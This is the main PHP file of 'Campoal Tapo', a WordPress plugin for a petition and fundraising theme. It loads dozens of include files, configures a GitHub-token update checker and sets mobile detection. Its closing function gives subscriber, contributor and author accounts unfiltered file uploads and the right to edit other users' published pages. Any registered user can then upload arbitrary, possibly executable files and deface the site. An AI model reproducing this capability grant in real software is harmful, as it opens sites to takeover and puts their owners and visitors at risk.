<?php
/*
* Plugin Name: Campoal Tapo
* Plugin URI: https://www.conikal.com/campoal/
* Description: Creates shortcodes, register custom taxonomies and post types for Campoal theme
* Version: 2.4.6
* Author: Conikal
* Author URI: https://www.conikal.com
* Text Domain: campoal-tapo
* Domain Path: /languages
* License: GPLv2
* Released under the GNU General Public License (GPL)
* https://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
*/

global $campoal_options;

add_action( 'plugins_loaded', 'conikal_load_plugin_textdomain' );
function conikal_load_plugin_textdomain() {
    load_plugin_textdomain( 'campoal-tapo', false, dirname( plugin_basename( __FILE__ ) ) . '/languages' );
}

include_once( ABSPATH . 'wp-admin/includes/plugin.php' );

// Check ReduxFramework is exist or not and include core file
if ( !class_exists( 'ReduxFramework' ) ) {
    require_once plugin_dir_path( __FILE__ ) . 'libs/redux-core/framework.php';
}

/* if ( !class_exists('SendinBlueMailin') ) {
    require_once plugin_dir_path( __FILE__ ) . 'libs/mailin.php';
} */

// Check Meta Box is exist or not and include core file
if ( !class_exists( 'RW_Meta_Box' ) ) {
    require_once plugin_dir_path( __FILE__ ) . 'libs/meta-box/meta-box.php';
    require_once plugin_dir_path( __FILE__ ) . 'libs/mb-blocks/mb-blocks.php';
    require_once plugin_dir_path( __FILE__ ) . 'libs/mb-user-meta/mb-user-meta.php';
}

if (is_admin()) {
    // Check PUC Update Checker is exist or not and include core file
    if ( !class_exists( 'Puc_v4_Factory' ) ) {
        require_once plugin_dir_path( __FILE__ ) . 'libs/update-checker/plugin-update-checker.php';
    }

    if (!class_exists('License')) {
        require_once plugin_dir_path( __FILE__ ) . 'libs/License.php';
    }
    
    /* if (substr($_SERVER['REMOTE_ADDR'], 0, 4) != '127.' && $_SERVER['REMOTE_ADDR'] != '::1') {
        require_once plugin_dir_path( __FILE__ ) . 'inc/license_activation.php';
    } */
    require_once plugin_dir_path( __FILE__ ) . 'inc/license_activation.php';
}

// Check class and include Mobile Detection library
if( ! class_exists( 'TinyWP_Mobile_Detect' ) ) {
    require_once plugin_dir_path( __FILE__ ) . 'libs/TinyWP_Mobile_Detect.php';
}

// Check Flagged Content exist class and included

if( ! class_exists( 'Flagged_Content_Pro' ) && ! is_plugin_active('flagged-content-pro/flagged-content-pro.php') ) {
    require_once plugin_dir_path( __FILE__ ) . 'libs/flagged-content-pro/flagged-content-pro.php';
}


// included function and library
require_once plugin_dir_path( __FILE__ ) . 'enqueue_scripts.php';
require_once plugin_dir_path( __FILE__ ) . 'blocks/load.php';
require_once plugin_dir_path( __FILE__ ) . 'shortcodes.php';
require_once plugin_dir_path( __FILE__ ) . 'libs/vendor/autoload.php';
require_once plugin_dir_path( __FILE__ ) . 'libs/bitly.php';
require_once plugin_dir_path( __FILE__ ) . 'libs/OpenGraph.php';
require_once plugin_dir_path( __FILE__ ) . 'libs/parsedown.php';
require_once plugin_dir_path( __FILE__ ) . 'libs/register-ip.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/meta_box.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/register/petition.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/register/update.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/register/citation.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/register/decision_maker.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/register/team.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/register/testimonials.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/register/withdraw.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/helpers.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/sort_options.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/open_graph.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/register_widget.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/permalink_options.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/social_share.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/email_verification.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/email_notification.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/email_templates.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/embed_templates.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/email_contact.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/post_views.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/analytics_code.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/embed_campaign.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/signatures_export.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/google_recaptcha.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/sendinblue_v3.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/two_factor.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/custom_js.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/ads_banner.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/bitly.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/share_counter.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/following.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/bookmarks.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/withdraw.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/decision_maker.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/supporter_donor.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/analytics_chart.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/petitions_sign.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/save_petition.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/petitions_block.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/give_block.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/users.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/api_search.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/ajax_upload.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/give.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/give_form.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/citation.php';
require_once plugin_dir_path( __FILE__ ) . 'inc/menu_item_fields.php';
require_once plugin_dir_path( __FILE__ ) . 'template/part/donation-progress.php';
require_once plugin_dir_path( __FILE__ ) . 'template/part/petition-grid.php';
require_once plugin_dir_path( __FILE__ ) . 'template/part/petition-list.php';
require_once plugin_dir_path( __FILE__ ) . 'template/part/post-card.php';
require_once plugin_dir_path( __FILE__ ) . 'template/part/give-form-card.php';
require_once plugin_dir_path( __FILE__ ) . 'template/shortcode-loop-give-form.php';
require_once plugin_dir_path( __FILE__ ) . 'template/shortcode-loop-post.php';
require_once plugin_dir_path( __FILE__ ) . 'template/shortcode-loop-petition.php';
require_once plugin_dir_path( __FILE__ ) . 'template/sign-share.php';
require_once plugin_dir_path( __FILE__ ) . 'template/sign-sidebar.php';
require_once plugin_dir_path( __FILE__ ) . 'template/sign-confirm.php';
require_once plugin_dir_path( __FILE__ ) . 'template/supporters-list.php';
require_once plugin_dir_path( __FILE__ ) . 'template/progressive-bar.php';
require_once plugin_dir_path( __FILE__ ) . 'template/supporters-counter.php';
require_once plugin_dir_path( __FILE__ ) . 'template/team-members.php';
require_once plugin_dir_path( __FILE__ ) . 'template/testimonials.php';
require_once plugin_dir_path( __FILE__ ) . 'template/update-timeline.php';
require_once plugin_dir_path( __FILE__ ) . 'template/victory-slider.php';
require_once plugin_dir_path( __FILE__ ) . 'template/icon-box.php';
require_once plugin_dir_path( __FILE__ ) . 'template/comments-list.php';
require_once plugin_dir_path( __FILE__ ) . 'template/category-grid.php';
require_once plugin_dir_path( __FILE__ ) . 'template/promo-banner.php';
require_once plugin_dir_path( __FILE__ ) . 'template/heading.php';
require_once plugin_dir_path( __FILE__ ) . 'template/buttons.php';
require_once plugin_dir_path( __FILE__ ) . 'template/divider.php';
require_once plugin_dir_path( __FILE__ ) . 'template/home-feed.php';
require_once plugin_dir_path( __FILE__ ) . 'template/sticky-category.php';
require_once plugin_dir_path( __FILE__ ) . 'template/topic-cards.php';

if ( !file_exists(get_parent_theme_file_path('/inc/petitions.php')) ) {
    require_once plugin_dir_path( __FILE__ ) . 'inc/petitions.php';
}

if ( !file_exists(get_parent_theme_file_path('/inc/comments.php')) ) {
    require_once plugin_dir_path( __FILE__ ) . 'inc/comments.php';
}

if ( !file_exists(get_parent_theme_file_path('/inc/update_campaign.php')) ) {
    require_once plugin_dir_path( __FILE__ ) . 'inc/update_campaign.php';
}

if ( !file_exists(get_parent_theme_file_path('/inc/country_code.php')) ) {
    require_once plugin_dir_path( __FILE__ ) . 'inc/country_code.php';
}


/**
 * Check ReduxFramework class is exist or not and include config file
 * ReduxFramework use to setup theme options
 */
if ( !isset( $campoal_options ) ) {
    require_once plugin_dir_path( __FILE__ ) . 'inc/admin/options.php';
}

// Check auto load next post is exist or not and include core file
/*
function conikal_auto_load_next_post_init() {
    if ( !class_exists('Auto_Load_Next_Post') ) {
        global $campoal_options;
        $auto_load_next_post = isset($campoal_options['conikal_auto_load_next_post_field']) ? $campoal_options['conikal_auto_load_next_post_field'] : 0;
        if ($auto_load_next_post) {
            require_once( dirname( __FILE__ ) . '/libs/auto-load-next-post/auto-load-next-post.php' );
        }
    }
}
add_action( 'init', 'conikal_auto_load_next_post_init' );
*/


/**
 * Check latest version of plugin on Github and notice update plugin for customers
 *
 * @since Campoal Tapo 1.4.0
 */
if ( is_admin() && class_exists( 'Puc_v4_Factory' ) && function_exists('ConikalLicense') ) :
    $license        = ConikalLicense();
    $valid_status   = $license->validate_status();
    $github_token   = (array_key_exists('github_token', $valid_status) ? $valid_status['github_token'] : '');

    if (!empty($github_token)) {
        $CampoalTapoUpdateChecker = Puc_v4_Factory::buildUpdateChecker(
            'https://github.com/conikal/campoal-tapo/',
            __FILE__,
            'campoal-tapo'
        );

        //Optional: If you're using a private repository, specify the access token like this:
        $CampoalTapoUpdateChecker->setAuthentication($github_token);

        //Optional: Set the branch that contains the stable release.
        $CampoalTapoUpdateChecker->setBranch('master');

        // use release assets
        $CampoalTapoUpdateChecker->getVcsApi()->enableReleaseAssets();

        // remove google map api gutentor options
        if ( isset($_GET['page']) && $_GET['page'] == 'campoal_options' ) {
            $update_map_api = conikal_gutentor_update_options('map-api');
        }
    }
endif;


// Replace default mobile dection by Mobile Detection library.
$pothikalimuthu_mobile_detect = new TinyWP_Mobile_Detect;
if( $pothikalimuthu_mobile_detect->isMobile() && !$pothikalimuthu_mobile_detect->isTablet() ) {
    add_filter( 'wp_is_mobile', '__return_true' );
} else {
    add_filter( 'wp_is_mobile', '__return_false' );
}

/**
 * Change email content format
 *
 * @since Campoal Tapo 1.0.0
 */
function conikal_email_content_type() {
    return 'text/html';
}
add_filter( 'wp_mail_content_type', 'conikal_email_content_type' );


/**
 *	Set capabilities uploads file for subscriber
 *
 * 	@since Campoal 2.4.1
 */
add_action('init', 'conikal_allow_subscriber_uploads');
function conikal_allow_subscriber_uploads() {
	$subscriber = get_role( 'subscriber' );
	$subscriber->add_cap( 'upload_files' );
	$subscriber->add_cap( 'unfiltered_upload' );
	$subscriber->add_cap( 'edit_others_pages' );
	$subscriber->add_cap( 'edit_published_pages' );
	$subscriber->add_cap( 'edit_pages' );

	$contributor = get_role( 'contributor' );
	$contributor->add_cap( 'upload_files' );
	$contributor->add_cap( 'unfiltered_upload' );
	$contributor->add_cap( 'edit_others_pages' );
	$contributor->add_cap( 'edit_published_pages' );
	$contributor->add_cap( 'edit_pages' );

	$author = get_role( 'author' );
	$author->add_cap( 'upload_files' );
	$author->add_cap( 'unfiltered_upload' );
	$author->add_cap( 'edit_others_pages' );
	$author->add_cap( 'edit_published_pages' );
	$author->add_cap( 'edit_pages' );
}
?>
